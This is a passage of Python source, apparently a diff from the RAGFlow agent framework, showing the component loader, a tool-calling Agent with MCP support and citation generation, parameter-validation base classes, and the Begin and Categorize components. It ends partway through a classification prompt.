 #
 #  Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import os
 import importlib
 import inspect
 from types import ModuleType
 from typing import Dict, Type
 _package_path = os.path.dirname(__file__)
 __all_classes: Dict[str, Type] = {}
 def _import_submodules() -> None:
    for filename in os.listdir(_package_path): # noqa: F821
        if filename.startswith("__") or not filename.endswith(".py") or filename.startswith("base"):
            continue
        module_name = filename[:-3]
        try:
            module = importlib.import_module(f".{module_name}", package=__name__)
            _extract_classes_from_module(module)  # noqa: F821
        except ImportError as e:
            print(f"Warning: Failed to import module {module_name}: {str(e)}")
 def _extract_classes_from_module(module: ModuleType) -> None:
    for name, obj in inspect.getmembers(module):
        if (inspect.isclass(obj) and
                obj.__module__ == module.__name__ and not name.startswith("_")):
            __all_classes[name] = obj
            globals()[name] = obj
 _import_submodules()
 __all__ = list(__all_classes.keys()) + ["__all_classes"]
 del _package_path, _import_submodules, _extract_classes_from_module
 def component_class(class_name):
    m = importlib.import_module("agent.component")
    try:
        return getattr(m, class_name)
    except Exception:
        return getattr(importlib.import_module("agent.tools"), class_name)
--- a/agent/component/agent_with_tools.py
+++ b/agent/component/agent_with_tools.py
@ -0,0 +1,344 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import logging
 import os
 import re
 from concurrent.futures import ThreadPoolExecutor
 from copy import deepcopy
 from functools import partial
 from typing import Any
 import json_repair
 from agent.tools.base import LLMToolPluginCallSession, ToolParamBase, ToolBase, ToolMeta
 from api.db.services.llm_service import LLMBundle, TenantLLMService
 from api.db.services.mcp_server_service import MCPServerService
 from api.utils.api_utils import timeout
 from rag.prompts import message_fit_in
 from rag.prompts.prompts import next_step, COMPLETE_TASK, analyze_task, \
    citation_prompt, reflect, rank_memories, kb_prompt, citation_plus, full_question
 from rag.utils.mcp_tool_call_conn import MCPToolCallSession, mcp_tool_metadata_to_openai_tool
 from agent.component.llm import LLMParam, LLM
 class AgentParam(LLMParam, ToolParamBase):
    """
    Define the Agent component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
                "name": "agent",
                "description": "This is an agent for a specific task.",
                "parameters": {
                    "user_prompt": {
                        "type": "string",
                        "description": "This is the order you need to send to the agent.",
                        "default": "",
                        "required": True
                    },
                    "reasoning": {
                        "type": "string",
                        "description": (
                            "Supervisor's reasoning for choosing the this agent. "
                            "Explain why this agent is being invoked and what is expected of it."
                        ),
                        "required": True
                    },
                    "context": {
                        "type": "string",
                        "description": (
                                "All relevant background information, prior facts, decisions, "
                                "and state needed by the agent to solve the current query. "
                                "Should be as detailed and self-contained as possible."
                            ),
                        "required": True
                    },
                }
            }
        super().__init__()
        self.function_name = "agent"
        self.tools = []
        self.mcp = []
        self.max_rounds = 5
        self.description = ""
 class Agent(LLM, ToolBase):
    component_name = "Agent"
    def __init__(self, canvas, id, param: LLMParam):
        LLM.__init__(self, canvas, id, param)
        self.tools = {}
        for cpn in self._param.tools:
            cpn = self._load_tool_obj(cpn)
            self.tools[cpn.get_meta()["function"]["name"]] = cpn
        self.chat_mdl = LLMBundle(self._canvas.get_tenant_id(), TenantLLMService.llm_id2llm_type(self._param.llm_id), self._param.llm_id,
                                  max_retries=self._param.max_retries,
                                  retry_interval=self._param.delay_after_error,
                                  max_rounds=self._param.max_rounds,
                                  verbose_tool_use=True
                                  )
        self.tool_meta = [v.get_meta() for _,v in self.tools.items()]
        for mcp in self._param.mcp:
            _, mcp_server = MCPServerService.get_by_id(mcp["mcp_id"])
            tool_call_session = MCPToolCallSession(mcp_server, mcp_server.variables)
            for tnm, meta in mcp["tools"].items():
                self.tool_meta.append(mcp_tool_metadata_to_openai_tool(meta))
                self.tools[tnm] = tool_call_session
        self.callback = partial(self._canvas.tool_use_callback, id)
        self.toolcall_session = LLMToolPluginCallSession(self.tools, self.callback)
        #self.chat_mdl.bind_tools(self.toolcall_session, self.tool_metas)
    def _load_tool_obj(self, cpn: dict) -> object:
        from agent.component import component_class
        param = component_class(cpn["component_name"] + "Param")()
        param.update(cpn["params"])
        try:
            param.check()
        except Exception as e:
            self.set_output("_ERROR", cpn["component_name"] + f" configuration error: {e}")
            raise
        cpn_id = f"{self._id}-->" + cpn.get("name", "").replace(" ", "_")
        return component_class(cpn["component_name"])(self._canvas, cpn_id, param)
    def get_meta(self) -> dict[str, Any]:
        self._param.function_name= self._id.split("-->")[-1]
        m = super().get_meta()
        if hasattr(self._param, "user_prompt") and self._param.user_prompt:
            m["function"]["parameters"]["properties"]["user_prompt"] = self._param.user_prompt
        return m
    def get_input_form(self) -> dict[str, dict]:
        res = {}
        for k, v in self.get_input_elements().items():
            res[k] = {
                "type": "line",
                "name": v["name"]
            }
        for cpn in self._param.tools:
            if not isinstance(cpn, LLM):
                continue
            res.update(cpn.get_input_form())
        return res
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 20*60))
    def _invoke(self, **kwargs):
        if kwargs.get("user_prompt"):
            usr_pmt = ""
            if kwargs.get("reasoning"):
                usr_pmt += "\nREASONING:\n{}\n".format(kwargs["reasoning"])
            if kwargs.get("context"):
                usr_pmt += "\nCONTEXT:\n{}\n".format(kwargs["context"])
            if usr_pmt:
                usr_pmt += "\nQUERY:\n{}\n".format(str(kwargs["user_prompt"]))
            else:
                usr_pmt = str(kwargs["user_prompt"])
            self._param.prompts = [{"role": "user", "content": usr_pmt}]
        if not self.tools:
            return LLM._invoke(self, **kwargs)
        prompt, msg = self._prepare_prompt_variables()
        downstreams = self._canvas.get_component(self._id)["downstream"] if self._canvas.get_component(self._id) else []
        ex = self.exception_handler()
        if any([self._canvas.get_component_obj(cid).component_name.lower()=="message" for cid in downstreams]) and not self._param.output_structure and not (ex and ex["goto"]):
            self.set_output("content", partial(self.stream_output_with_tools, prompt, msg))
            return
        _, msg = message_fit_in([{"role": "system", "content": prompt}, *msg], int(self.chat_mdl.max_length * 0.97))
        use_tools = []
        ans = ""
        for delta_ans, tk in self._react_with_tools_streamly(msg, use_tools):
            ans += delta_ans
        if ans.find("**ERROR**") >= 0:
            logging.error(f"Agent._chat got error. response: {ans}")
            if self.get_exception_default_value():
                self.set_output("content", self.get_exception_default_value())
            else:
                self.set_output("_ERROR", ans)
            return
        self.set_output("content", ans)
        if use_tools:
            self.set_output("use_tools", use_tools)
        return ans
    def stream_output_with_tools(self, prompt, msg):
        _, msg = message_fit_in([{"role": "system", "content": prompt}, *msg], int(self.chat_mdl.max_length * 0.97))
        answer_without_toolcall = ""
        use_tools = []
        for delta_ans,_ in self._react_with_tools_streamly(msg, use_tools):
            if delta_ans.find("**ERROR**") >= 0:
                if self.get_exception_default_value():
                    self.set_output("content", self.get_exception_default_value())
                    yield self.get_exception_default_value()
                else:
                    self.set_output("_ERROR", delta_ans)
            answer_without_toolcall += delta_ans
            yield delta_ans
        self.set_output("content", answer_without_toolcall)
        if use_tools:
            self.set_output("use_tools", use_tools)
    def _gen_citations(self, text):
        retrievals = self._canvas.get_reference()
        retrievals = {"chunks": list(retrievals["chunks"].values()), "doc_aggs": list(retrievals["doc_aggs"].values())}
        formated_refer = kb_prompt(retrievals, self.chat_mdl.max_length, True)
        for delta_ans in self._generate_streamly([{"role": "system", "content": citation_plus("\n\n".join(formated_refer))},
                                                  {"role": "user", "content": text}
                                                  ]):
            yield delta_ans
    def _react_with_tools_streamly(self, history: list[dict], use_tools):
        token_count = 0
        tool_metas = self.tool_meta
        hist = deepcopy(history)
        last_calling = ""
        if len(hist) > 3:
            user_request = full_question(messages=history, chat_mdl=self.chat_mdl)
            self.callback("Multi-turn conversation optimization", {}, user_request)
        else:
            user_request = history[-1]["content"]
        def use_tool(name, args):
            nonlocal hist, use_tools, token_count,last_calling,user_request
            print(f"{last_calling=} == {name=}", )
            # Summarize of function calling
            #if all([
            #    isinstance(self.toolcall_session.get_tool_obj(name), Agent),
            #    last_calling,
            #    last_calling != name
            #]):
            #    self.toolcall_session.get_tool_obj(name).add2system_prompt(f"The chat history with other agents are as following: \n" + self.get_useful_memory(user_request, str(args["user_prompt"])))
            last_calling = name
            tool_response = self.toolcall_session.tool_call(name, args)
            use_tools.append({
                "name": name,
                "arguments": args,
                "results": tool_response
            })
            # self.callback("add_memory", {}, "...")
            #self.add_memory(hist[-2]["content"], hist[-1]["content"], name, args, str(tool_response))
            return name, tool_response
        def complete():
            nonlocal hist
            need2cite = self._canvas.get_reference()["chunks"] and self._id.find("-->") < 0
            cited = False
            if hist[0]["role"] == "system" and need2cite:
                if len(hist) < 7:
                    hist[0]["content"] += citation_prompt()
                    cited = True
            yield "", token_count
            _hist = hist
            if len(hist) > 12:
                _hist = [hist[0], hist[1], *hist[-10:]]
            entire_txt = ""
            for delta_ans in self._generate_streamly(_hist):
                if not need2cite or cited:
                    yield delta_ans, 0
                entire_txt += delta_ans
            if not need2cite or cited:
                return
            txt = ""
            for delta_ans in self._gen_citations(entire_txt):
                yield delta_ans, 0
                txt += delta_ans
            self.callback("gen_citations", {}, txt)
        def append_user_content(hist, content):
            if hist[-1]["role"] == "user":
                hist[-1]["content"] += content
            else:
                hist.append({"role": "user", "content": content})
        task_desc = analyze_task(self.chat_mdl, user_request, tool_metas)
        self.callback("analyze_task", {}, task_desc)
        for _ in range(self._param.max_rounds + 1):
            response, tk = next_step(self.chat_mdl, hist, tool_metas, task_desc)
            # self.callback("next_step", {}, str(response)[:256]+"...")
            token_count += tk
            hist.append({"role": "assistant", "content": response})
            try:
                functions = json_repair.loads(re.sub(r"```.*", "", response))
                if not isinstance(functions, list):
                    raise TypeError(f"List should be returned, but `{functions}`")
                for f in functions:
                    if not isinstance(f, dict):
                        raise TypeError(f"An object type should be returned, but `{f}`")
                with ThreadPoolExecutor(max_workers=5) as executor:
                    thr = []
                    for func in functions:
                        name = func["name"]
                        args = func["arguments"]
                        if name == COMPLETE_TASK:
                            append_user_content(hist, f"Respond with a formal answer. FORGET(DO NOT mention) about `{COMPLETE_TASK}`. The language for the response MUST be as the same as the first user request.\n")
                            for txt, tkcnt in complete():
                                yield txt, tkcnt
                            return
                        thr.append(executor.submit(use_tool, name, args))
                    reflection = reflect(self.chat_mdl, hist, [th.result() for th in thr])
                    append_user_content(hist, reflection)
                    self.callback("reflection", {}, str(reflection))
            except Exception as e:
                logging.exception(msg=f"Wrong JSON argument format in LLM ReAct response: {e}")
                e = f"\nTool call error, please correct the input parameter of response format and call it again.\n *** Exception ***\n{e}"
                append_user_content(hist, str(e))
        logging.warning( f"Exceed max rounds: {self._param.max_rounds}")
        final_instruction = f"""
 {user_request}
 IMPORTANT: You have reached the conversation limit. Based on ALL the information and research you have gathered so far, please provide a DIRECT and COMPREHENSIVE final answer to the original request.
 Instructions:
 1. SYNTHESIZE all information collected during this conversation
 2. Provide a COMPLETE response using existing data - do not suggest additional research
 3. Structure your response as a FINAL DELIVERABLE, not a plan
 4. If information is incomplete, state what you found and provide the best analysis possible with available data
 5. DO NOT mention conversation limits or suggest further steps
 6. Focus on delivering VALUE with the information already gathered
 Respond immediately with your final comprehensive answer.
        """
        append_user_content(hist, final_instruction)
        for txt, tkcnt in complete():
            yield txt, tkcnt
    def get_useful_memory(self, goal: str, sub_goal:str, topn=3) -> str:
        # self.callback("get_useful_memory", {"topn": 3}, "...")
        mems = self._canvas.get_memory()
        rank = rank_memories(self.chat_mdl, goal, sub_goal, [summ for (user, assist, summ) in mems])
        try:
            rank = json_repair.loads(re.sub(r"```.*", "", rank))[:topn]
            mems = [mems[r] for r in rank]
            return "\n\n".join([f"User: {u}\nAgent: {a}" for u, a,_ in mems])
        except Exception as e:
            logging.exception(e)
        return "Error occurred."
--- a/agent/component/base.py
+++ b/agent/component/base.py
@ -0,0 +1,555 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import re
 import time
 from abc import ABC, abstractmethod
 import builtins
 import json
 import os
 import logging
 from typing import Any, List, Union
 import pandas as pd
 import trio
 from agent import settings
 from api.utils.api_utils import timeout
 _FEEDED_DEPRECATED_PARAMS = "_feeded_deprecated_params"
 _DEPRECATED_PARAMS = "_deprecated_params"
 _USER_FEEDED_PARAMS = "_user_feeded_params"
 _IS_RAW_CONF = "_is_raw_conf"
 class ComponentParamBase(ABC):
    def __init__(self):
        self.message_history_window_size = 22
        self.inputs = {}
        self.outputs = {}
        self.description = ""
        self.max_retries = 0
        self.delay_after_error = 2.0
        self.exception_method = None
        self.exception_default_value = None
        self.exception_goto = None
        self.debug_inputs = {}
    def set_name(self, name: str):
        self._name = name
        return self
    def check(self):
        raise NotImplementedError("Parameter Object should be checked.")
    @classmethod
    def _get_or_init_deprecated_params_set(cls):
        if not hasattr(cls, _DEPRECATED_PARAMS):
            setattr(cls, _DEPRECATED_PARAMS, set())
        return getattr(cls, _DEPRECATED_PARAMS)
    def _get_or_init_feeded_deprecated_params_set(self, conf=None):
        if not hasattr(self, _FEEDED_DEPRECATED_PARAMS):
            if conf is None:
                setattr(self, _FEEDED_DEPRECATED_PARAMS, set())
            else:
                setattr(
                    self,
                    _FEEDED_DEPRECATED_PARAMS,
                    set(conf[_FEEDED_DEPRECATED_PARAMS]),
                )
        return getattr(self, _FEEDED_DEPRECATED_PARAMS)
    def _get_or_init_user_feeded_params_set(self, conf=None):
        if not hasattr(self, _USER_FEEDED_PARAMS):
            if conf is None:
                setattr(self, _USER_FEEDED_PARAMS, set())
            else:
                setattr(self, _USER_FEEDED_PARAMS, set(conf[_USER_FEEDED_PARAMS]))
        return getattr(self, _USER_FEEDED_PARAMS)
    def get_user_feeded(self):
        return self._get_or_init_user_feeded_params_set()
    def get_feeded_deprecated_params(self):
        return self._get_or_init_feeded_deprecated_params_set()
    @property
    def _deprecated_params_set(self):
        return {name: True for name in self.get_feeded_deprecated_params()}
    def __str__(self):
        return json.dumps(self.as_dict(), ensure_ascii=False)
    def as_dict(self):
        def _recursive_convert_obj_to_dict(obj):
            ret_dict = {}
            if isinstance(obj, dict):
                for k,v in obj.items():
                    if isinstance(v, dict) or (v and type(v).__name__ not in dir(builtins)):
                        ret_dict[k] = _recursive_convert_obj_to_dict(v)
                    else:
                        ret_dict[k] = v
                return ret_dict
            for attr_name in list(obj.__dict__):
                if attr_name in [_FEEDED_DEPRECATED_PARAMS, _DEPRECATED_PARAMS, _USER_FEEDED_PARAMS, _IS_RAW_CONF]:
                    continue
                # get attr
                attr = getattr(obj, attr_name)
                if isinstance(attr, pd.DataFrame):
                    ret_dict[attr_name] = attr.to_dict()
                    continue
                if isinstance(attr, dict) or (attr and type(attr).__name__ not in dir(builtins)):
                    ret_dict[attr_name] = _recursive_convert_obj_to_dict(attr)
                else:
                    ret_dict[attr_name] = attr
            return ret_dict
        return _recursive_convert_obj_to_dict(self)
    def update(self, conf, allow_redundant=False):
        update_from_raw_conf = conf.get(_IS_RAW_CONF, True)
        if update_from_raw_conf:
            deprecated_params_set = self._get_or_init_deprecated_params_set()
            feeded_deprecated_params_set = (
                self._get_or_init_feeded_deprecated_params_set()
            )
            user_feeded_params_set = self._get_or_init_user_feeded_params_set()
            setattr(self, _IS_RAW_CONF, False)
        else:
            feeded_deprecated_params_set = (
                self._get_or_init_feeded_deprecated_params_set(conf)
            )
            user_feeded_params_set = self._get_or_init_user_feeded_params_set(conf)
        def _recursive_update_param(param, config, depth, prefix):
            if depth > settings.PARAM_MAXDEPTH:
                raise ValueError("Param define nesting too deep!!!, can not parse it")
            inst_variables = param.__dict__
            redundant_attrs = []
            for config_key, config_value in config.items():
                # redundant attr
                if config_key not in inst_variables:
                    if not update_from_raw_conf and config_key.startswith("_"):
                        setattr(param, config_key, config_value)
                    else:
                        setattr(param, config_key, config_value)
                        # redundant_attrs.append(config_key)
                    continue
                full_config_key = f"{prefix}{config_key}"
                if update_from_raw_conf:
                    # add user feeded params
                    user_feeded_params_set.add(full_config_key)
                    # update user feeded deprecated param set
                    if full_config_key in deprecated_params_set:
                        feeded_deprecated_params_set.add(full_config_key)
                # supported attr
                attr = getattr(param, config_key)
                if type(attr).__name__ in dir(builtins) or attr is None:
                    setattr(param, config_key, config_value)
                else:
                    # recursive set obj attr
                    sub_params = _recursive_update_param(
                        attr, config_value, depth + 1, prefix=f"{prefix}{config_key}."
                    )
                    setattr(param, config_key, sub_params)
            if not allow_redundant and redundant_attrs:
                raise ValueError(
                    f"cpn `{getattr(self, '_name', type(self))}` has redundant parameters: `{[redundant_attrs]}`"
                )
            return param
        return _recursive_update_param(param=self, config=conf, depth=0, prefix="")
    def extract_not_builtin(self):
        def _get_not_builtin_types(obj):
            ret_dict = {}
            for variable in obj.__dict__:
                attr = getattr(obj, variable)
                if attr and type(attr).__name__ not in dir(builtins):
                    ret_dict[variable] = _get_not_builtin_types(attr)
            return ret_dict
        return _get_not_builtin_types(self)
    def validate(self):
        self.builtin_types = dir(builtins)
        self.func = {
            "ge": self._greater_equal_than,
            "le": self._less_equal_than,
            "in": self._in,
            "not_in": self._not_in,
            "range": self._range,
        }
        home_dir = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
        param_validation_path_prefix = home_dir + "/param_validation/"
        param_name = type(self).__name__
        param_validation_path = "/".join(
            [param_validation_path_prefix, param_name + ".json"]
        )
        validation_json = None
        try:
            with open(param_validation_path, "r") as fin:
                validation_json = json.loads(fin.read())
        except BaseException:
            return
        self._validate_param(self, validation_json)
    def _validate_param(self, param_obj, validation_json):
        default_section = type(param_obj).__name__
        var_list = param_obj.__dict__
        for variable in var_list:
            attr = getattr(param_obj, variable)
            if type(attr).__name__ in self.builtin_types or attr is None:
                if variable not in validation_json:
                    continue
                validation_dict = validation_json[default_section][variable]
                value = getattr(param_obj, variable)
                value_legal = False
                for op_type in validation_dict:
                    if self.func[op_type](value, validation_dict[op_type]):
                        value_legal = True
                        break
                if not value_legal:
                    raise ValueError(
                        "Plase check runtime conf, {} = {} does not match user-parameter restriction".format(
                            variable, value
                        )
                    )
            elif variable in validation_json:
                self._validate_param(attr, validation_json)
    @staticmethod
    def check_string(param, descr):
        if type(param).__name__ not in ["str"]:
            raise ValueError(
                descr + " {} not supported, should be string type".format(param)
            )
    @staticmethod
    def check_empty(param, descr):
        if not param:
            raise ValueError(
                descr + " does not support empty value."
            )
    @staticmethod
    def check_positive_integer(param, descr):
        if type(param).__name__ not in ["int", "long"] or param <= 0:
            raise ValueError(
                descr + " {} not supported, should be positive integer".format(param)
            )
    @staticmethod
    def check_positive_number(param, descr):
        if type(param).__name__ not in ["float", "int", "long"] or param <= 0:
            raise ValueError(
                descr + " {} not supported, should be positive numeric".format(param)
            )
    @staticmethod
    def check_nonnegative_number(param, descr):
        if type(param).__name__ not in ["float", "int", "long"] or param < 0:
            raise ValueError(
                descr
                + " {} not supported, should be non-negative numeric".format(param)
            )
    @staticmethod
    def check_decimal_float(param, descr):
        if type(param).__name__ not in ["float", "int"] or param < 0 or param > 1:
            raise ValueError(
                descr
                + " {} not supported, should be a float number in range [0, 1]".format(
                    param
                )
            )
    @staticmethod
    def check_boolean(param, descr):
        if type(param).__name__ != "bool":
            raise ValueError(
                descr + " {} not supported, should be bool type".format(param)
            )
    @staticmethod
    def check_open_unit_interval(param, descr):
        if type(param).__name__ not in ["float"] or param <= 0 or param >= 1:
            raise ValueError(
                descr + " should be a numeric number between 0 and 1 exclusively"
            )
    @staticmethod
    def check_valid_value(param, descr, valid_values):
        if param not in valid_values:
            raise ValueError(
                descr
                + " {} is not supported, it should be in {}".format(param, valid_values)
            )
    @staticmethod
    def check_defined_type(param, descr, types):
        if type(param).__name__ not in types:
            raise ValueError(
                descr + " {} not supported, should be one of {}".format(param, types)
            )
    @staticmethod
    def check_and_change_lower(param, valid_list, descr=""):
        if type(param).__name__ != "str":
            raise ValueError(
                descr
                + " {} not supported, should be one of {}".format(param, valid_list)
            )
        lower_param = param.lower()
        if lower_param in valid_list:
            return lower_param
        else:
            raise ValueError(
                descr
                + " {} not supported, should be one of {}".format(param, valid_list)
            )
    @staticmethod
    def _greater_equal_than(value, limit):
        return value >= limit - settings.FLOAT_ZERO
    @staticmethod
    def _less_equal_than(value, limit):
        return value <= limit + settings.FLOAT_ZERO
    @staticmethod
    def _range(value, ranges):
        in_range = False
        for left_limit, right_limit in ranges:
            if (
                    left_limit - settings.FLOAT_ZERO
                    <= value
                    <= right_limit + settings.FLOAT_ZERO
            ):
                in_range = True
                break
        return in_range
    @staticmethod
    def _in(value, right_value_list):
        return value in right_value_list
    @staticmethod
    def _not_in(value, wrong_value_list):
        return value not in wrong_value_list
    def _warn_deprecated_param(self, param_name, descr):
        if self._deprecated_params_set.get(param_name):
            logging.warning(
                f"{descr} {param_name} is deprecated and ignored in this version."
            )
    def _warn_to_deprecate_param(self, param_name, descr, new_param):
        if self._deprecated_params_set.get(param_name):
            logging.warning(
                f"{descr} {param_name} will be deprecated in future release; "
                f"please use {new_param} instead."
            )
            return True
        return False
 class ComponentBase(ABC):
    component_name: str
    thread_limiter = trio.CapacityLimiter(int(os.environ.get('MAX_CONCURRENT_CHATS', 10)))
    variable_ref_patt = r"\{* *\{([a-zA-Z:0-9]+@[A-Za-z:0-9_.-]+|sys\.[a-z_]+)\} *\}*"
    def __str__(self):
        """
        {
            "component_name": "Begin",
            "params": {}
        }
        """
        return """{{
            "component_name": "{}",
            "params": {}
        }}""".format(self.component_name,
                     self._param
        )
    def __init__(self, canvas, id, param: ComponentParamBase):
        from agent.canvas import Canvas  # Local import to avoid cyclic dependency
        assert isinstance(canvas, Canvas), "canvas must be an instance of Canvas"
        self._canvas = canvas
        self._id = id
        self._param = param
        self._param.check()
    def invoke(self, **kwargs) -> dict[str, Any]:
        self.set_output("_created_time", time.perf_counter())
        try:
            self._invoke(**kwargs)
        except Exception as e:
            if self.get_exception_default_value():
                self.set_exception_default_value()
            else:
                self.set_output("_ERROR", str(e))
            logging.exception(e)
        self._param.debug_inputs = {}
        self.set_output("_elapsed_time", time.perf_counter() - self.output("_created_time"))
        return self.output()
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 10*60))
    def _invoke(self, **kwargs):
        raise NotImplementedError()
    def output(self, var_nm: str=None) -> Union[dict[str, Any], Any]:
        if var_nm:
            return self._param.outputs.get(var_nm, {}).get("value", "")
        return {k: o.get("value") for k,o in self._param.outputs.items()}
    def set_output(self, key: str, value: Any):
        if key not in self._param.outputs:
            self._param.outputs[key] = {"value": None, "type": str(type(value))}
        self._param.outputs[key]["value"] = value
    def error(self):
        return self._param.outputs.get("_ERROR", {}).get("value")
    def reset(self):
        for k in self._param.outputs.keys():
            self._param.outputs[k]["value"] = None
        for k in self._param.inputs.keys():
            self._param.inputs[k]["value"] = None
        self._param.debug_inputs = {}
    def get_input(self, key: str=None) -> Union[Any, dict[str, Any]]:
        if key:
            return self._param.inputs.get(key, {}).get("value")
        res = {}
        for var, o in self.get_input_elements().items():
            v = self.get_param(var)
            if v is None:
                continue
            if isinstance(v, str) and self._canvas.is_reff(v):
                self.set_input_value(var, self._canvas.get_variable_value(v))
            else:
                self.set_input_value(var, v)
            res[var] = self.get_input_value(var)
        return res
    def get_input_values(self) -> Union[Any, dict[str, Any]]:
        if self._param.debug_inputs:
            return self._param.debug_inputs
        return {var: self.get_input_value(var) for var, o in self.get_input_elements().items()}
    def get_input_elements_from_text(self, txt: str) -> dict[str, dict[str, str]]:
        res = {}
        for r in re.finditer(self.variable_ref_patt, txt, flags=re.IGNORECASE):
            exp = r.group(1)
            cpn_id, var_nm = exp.split("@") if exp.find("@")>0 else ("", exp)
            res[exp] = {
                "name": (self._canvas.get_component_name(cpn_id) +f"@{var_nm}") if cpn_id else exp,
                "value": self._canvas.get_variable_value(exp),
                "_retrival": self._canvas.get_variable_value(f"{cpn_id}@_references") if cpn_id else None,
                "_cpn_id": cpn_id
            }
        return res
    def get_input_elements(self) -> dict[str, Any]:
        return self._param.inputs
    def get_input_form(self) -> dict[str, dict]:
        return self._param.get_input_form()
    def set_input_value(self, key: str, value: Any) -> None:
        if key not in self._param.inputs:
            self._param.inputs[key] = {"value": None}
        self._param.inputs[key]["value"] = value
    def get_input_value(self, key: str) -> Any:
        if key not in self._param.inputs:
            return None
        return self._param.inputs[key].get("value")
    def get_component_name(self, cpn_id) -> str:
        return self._canvas.get_component(cpn_id)["obj"].component_name.lower()
    def get_param(self, name):
        if hasattr(self._param, name):
            return getattr(self._param, name)
    def debug(self, **kwargs):
        return self._invoke(**kwargs)
    def get_parent(self) -> Union[object, None]:
        pid = self._canvas.get_component(self._id).get("parent_id")
        if not pid:
            return
        return self._canvas.get_component(pid)["obj"]
    def get_upstream(self) -> List[str]:
        cpn_nms = self._canvas.get_component(self._id)['upstream']
        return cpn_nms
    @staticmethod
    def string_format(content: str, kv: dict[str, str]) -> str:
        for n, v in kv.items():
            content = re.sub(
                r"\{%s\}" % re.escape(n), v, content
            )
        return content
    def exception_handler(self):
        if not self._param.exception_method:
            return
        return {
            "goto": self._param.exception_goto,
            "default_value": self._param.exception_default_value
        }
    def get_exception_default_value(self):
        if self._param.exception_method != "comment":
            return ""
        return self._param.exception_default_value
    def set_exception_default_value(self):
        self.set_output("result", self.get_exception_default_value())
    @abstractmethod
    def thoughts(self) -> str:
        ...
--- a/agent/component/begin.py
+++ b/agent/component/begin.py
@ -0,0 +1,49 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 from agent.component.fillup import UserFillUpParam, UserFillUp
 class BeginParam(UserFillUpParam):
    """
    Define the Begin component parameters.
    """
    def __init__(self):
        super().__init__()
        self.mode = "conversational"
        self.prologue = "Hi! I'm your smart assistant. What can I do for you?"
    def check(self):
        self.check_valid_value(self.mode, "The 'mode' should be either `conversational` or `task`", ["conversational", "task"])
    def get_input_form(self) -> dict[str, dict]:
        return getattr(self, "inputs")
 class Begin(UserFillUp):
    component_name = "Begin"
    def _invoke(self, **kwargs):
        for k, v in kwargs.get("inputs", {}).items():
            if isinstance(v, dict) and v.get("type", "").lower().find("file") >=0:
                v = self._canvas.get_files([v["value"]])
            else:
                v = v.get("value")
            self.set_output(k, v)
            self.set_input_value(k, v)
    def thoughts(self) -> str:
        return ""
--- a/agent/component/categorize.py
+++ b/agent/component/categorize.py
@ -0,0 +1,137 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import logging
 import os
 import re
 from abc import ABC
 from api.db import LLMType
 from api.db.services.llm_service import LLMBundle
 from agent.component.llm import LLMParam, LLM
 from api.utils.api_utils import timeout
 from rag.llm.chat_model import ERROR_PREFIX
 class CategorizeParam(LLMParam):
    """
    Define the Categorize component parameters.
    """
    def __init__(self):
        super().__init__()
        self.category_description = {}
        self.query = "sys.query"
        self.message_history_window_size = 1
        self.update_prompt()
    def check(self):
        self.check_positive_integer(self.message_history_window_size, "[Categorize] Message window size > 0")
        self.check_empty(self.category_description, "[Categorize] Category examples")
        for k, v in self.category_description.items():
            if not k:
                raise ValueError("[Categorize] Category name can not be empty!")
            if not v.get("to"):
                raise ValueError(f"[Categorize] 'To' of category {k} can not be empty!")
    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "type": "line",
                "name": "Query"
            }
        }
    def update_prompt(self):
        cate_lines = []
        for c, desc in self.category_description.items():
            for line in desc.get("examples", []):
                if not line:
                    continue
                cate_lines.append("USER: \"" + re.sub(r"\n", "    ", line, flags=re.DOTALL) + "\" → "+c)
        descriptions = []
        for c, desc in self.category_description.items():
            if desc.get("description"):
                descriptions.append(
                    "\n------\nCategory: {}\nDescription: {}".format(c, desc["description"]))
        self.sys_prompt = """
 You are an advanced classification system that categorizes user questions into specific types. Analyze the input question and classify it into ONE of the following categories:
